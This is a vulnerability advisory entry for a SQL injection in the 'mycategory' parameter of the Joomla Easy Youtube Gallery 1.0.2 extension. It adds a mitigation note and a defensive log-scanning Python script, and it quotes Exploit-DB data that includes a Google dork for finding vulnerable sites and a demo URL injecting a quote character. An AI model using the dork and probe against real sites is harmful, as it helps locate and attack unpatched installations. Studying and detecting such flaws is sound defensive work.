Vendor: Easy Youtube Gallery
By: Persian Hack Team
CVSS: 9 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Easy Youtube Gallery
Affected Version From: 1.0.2
Affected Version To: 1.0.2
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2016

Joomla Easy Youtube Gallery 1.0.2 SQL Injection Vulnerability

Joomla Easy Youtube Gallery 1.0.2 is vulnerable to SQL injection. An attacker can inject malicious SQL code into the 'mycategory' parameter of the 'com_easy_youtube_gallery' component. This can be exploited to gain access to the underlying database and, potentially, to the sensitive information stored in it.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
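
As an added example (not part of the original advisory or the extension's code), the validation described above can also be applied to web-server access logs to find requests whose `mycategory` value would have failed it. It assumes `mycategory` is a numeric category ID and that the log is in combined format; the log lines and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

COMPONENT = "com_easy_youtube_gallery"
# Assumption: mycategory is a numeric category ID (the page's demo URL uses 0).
NUMERIC_ID = re.compile(r"[0-9]{1,10}")
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_mycategory(url):
    """Return the decoded mycategory values in url that are not plain integers."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if COMPONENT not in query.get("option", []):
        return []  # request is for a different component
    return [v for v in query.get("mycategory", []) if not NUMERIC_ID.fullmatch(v)]


def scan(lines):
    """Return (client_ip, bad_values) for each log line that fails validation."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        bad = suspicious_mycategory(m.group(1))
        if bad:
            hits.append((line.split(" ", 1)[0], bad))
    return hits


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [22/Mar/2016:10:00:01 +0000] "GET /index.php?option=com_easy_youtube_gallery&view=videos&mycategory=3&defaultvideo=9&Itemid=752 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [22/Mar/2016:10:00:05 +0000] "GET /index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0%27&defaultvideo=9&Itemid=752 HTTP/1.1" 500 312',
    '198.51.100.7 - - [22/Mar/2016:10:00:09 +0000] "GET /index.php?option=com_content&mycategory=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, values in scan(SAMPLE_LOG):
        print(ip, values)
```

The same allow-list check (digits only, bounded length) is what the component should enforce on `mycategory` before the value reaches a query.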

Exploit-DB raw data:

######################
# Exploit Title :  Joomla Easy Youtube Gallery 1.0.2 SQL Injection Vulnerability
# Exploit Author : Persian Hack Team
# Vendor Homepage :  http://extensions.joomla.org/extension/easy-youtube-gallery
# Google Dork : inurl:com_easy_youtube_gallery mycategory 
# Date: 2016/03/22
# Version: 1.0.2
######################
# PoC:
# mycategory=[SQL]
# 
# Demo:
# http://server/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0%27&defaultvideo=9&Itemid=752
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Homepage : persian-team.ir
# Greetz : Milad_Hacking & FireKernel And You
######################